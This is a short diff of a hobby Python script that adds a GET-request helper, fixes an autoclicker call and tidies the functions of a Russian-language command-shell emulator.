@@ -8,7 +8,6 @@ def pip_install():
     os.system('pip install requests')
     os.system('pip install colorama')
     os.system('pip install pyAesCrypt')
-    os.system('pip install pygame')
 class hack:
     def ttbb():
         import os
@@ -150,7 +149,10 @@ class hack:
     def clicker():
         import pyautogui
         while True:
-            pyautogui.clicked()
+            pyautogui.click()
+    def connect(site):
+        import requests
+        requests.get("https://"+site)
 class cmd():
     def command():
         print('Для получения сведений об определенной команде наберите HELP <имя команды>')
@@ -259,8 +261,4 @@ class cmd():
         os.system(a)
     def cmd(a):
         import os
-        os.startfile(a)
-    def cd(a):
-        import os
-        os.system('start')
-        os.system('cd ' + a)
+        os.startfile(a)
\ No newline at end of file
